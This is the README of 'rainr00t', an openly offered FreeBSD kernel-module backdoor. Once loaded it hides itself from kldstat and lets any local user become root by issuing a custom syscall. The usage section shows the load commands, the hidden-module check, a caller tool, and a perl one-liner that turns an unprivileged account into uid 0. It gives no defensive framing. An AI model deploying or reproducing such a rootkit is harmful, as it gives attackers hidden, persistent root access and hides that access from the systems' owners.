rainr00t
========

instant root-priv backd00r via kernelland anyone? get root and hide the module.

well, this module, once loaded, instantly gives the calling thread/user root, without spawning an extra shell or the like.

new feature in version 0.2
--------------------------

automatically hiding the loaded module. be aware that you can't easily unload it now ;)

usage
-----

kernel
******

    root@crashb0x:~/gainroot # uname -a
    FreeBSD crashb0x 10.1-RELEASE FreeBSD 10.1-RELEASE #0 r274401: Tue Nov 11 21:02:49 UTC 2014     root@releng1.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC  amd64
    root@crashb0x:~/gainroot # kldload ./rainroot.ko
    root@crashb0x:~/gainroot # kldstat
    Id Refs Address            Size     Name
     1    3 0xffffffff80200000 1755658  kernel

No rainroot in kldstat, just the default kernel.

userland
********

# userland tool, to call the newly loaded syscall (normally it's syscall 210, depending on whether you already have extra syscalls on your box). In this example it is syscall nr 211.

compile it

    l00ser@crashb0x:/tmp $ gcc48 caller.c -o caller

test for help

    # ./caller
    rainroot caller
    use appropiate syscallnumber (default: 210)
    example: ./caller 210

execute and get root

    l00ser@crashb0x:/tmp % ./caller 211
    l00ser@crashb0x:/tmp % id
    uid=0(root) gid=0(wheel) egid=1001(l00ser) groups=1001(l00ser)

besides the caller, you could also use any language or operation that can issue the syscall. for instance this perl one-liner:

    l00ser@crashb0x:~ % id
    uid=1001(l00ser) gid=1001(l00ser) groups=1001(l00ser)
    l00ser@crashb0x:~ % perl -e 'syscall(211);'
    l00ser@crashb0x:~ % id
    uid=0(root) gid=0(wheel) egid=1001(l00ser) groups=1001(l00ser)

author
------

dash